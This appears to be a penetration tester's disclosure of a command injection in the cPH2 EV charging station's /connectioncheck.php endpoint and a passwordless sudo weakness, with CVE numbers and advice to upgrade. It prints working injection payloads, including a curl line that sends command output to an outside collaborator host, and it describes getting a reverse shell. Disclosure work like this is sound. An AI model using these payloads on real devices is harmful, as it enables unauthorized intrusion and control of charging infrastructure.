During a web application penetration test for one of our clients we identified an OS Command Injection in the cPH2 charging station produced by eCharge Hardy Barth GmbH.

The cPH2 charging station comes with a web interface where an administrator can monitor and manage real time usage, charge logs, firmware update as well as configuration settings.

Configuration Page

The vulnerable PHP page is not visible in the user interface, but an inspection of the page source unveiled the existence of the "/connectioncheck.php" endpoint, which takes an IP address as a parameter. Initially designed to assess connectivity to the provided IP, likely through a ping command, this endpoint may be susceptible to OS Command Injection.

Vulnerable endpoint discovered in the page source of /config.php

Using a straightforward payload such as ip= && ${whoami}, the server responds with && ${whoami} => <b>SUCCESS</b>. This indicates that the command injection has been successfully executed. However, it is evident that the server is not displaying the output or result of the executed command.

In order to verify that the paylaod is executed and to extract data, we tried an out-of-band payload && curl $(whoami).puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com and we received DNS and HTTP request to our burp collaborator for the domain www-data.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com.

DNS request received for the domain www-data.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com.

Having confirmed the successful execution of the payload on the target device, we can now deploy a payload to initiate a reverse shell. This specific OS Command Injection vulnerability is formally identified as CVE-2023-46359.

Reverse shell obtained as www-data

As we can see on the screenshot above, the service is currently running under the user context of www-data, and it has been discovered that this user possesses unnecessary privileges, specifically the ability to execute sudo commands without requiring a password. This configuration could pose a security risk, as an attacker with access to the www-data context may exploit these elevated privileges for unauthorized actions on the system. This vulnerability is referenced by as CVE-2023-46360.

A nuclei template for the CVE-2023-46359 can be found on the nuclei-templates repository.

Both vulnerabilities affect any cPH2 Charging Station version < 2.0.0.
The affected customers are advised to update their system to the version 2.0.0 or later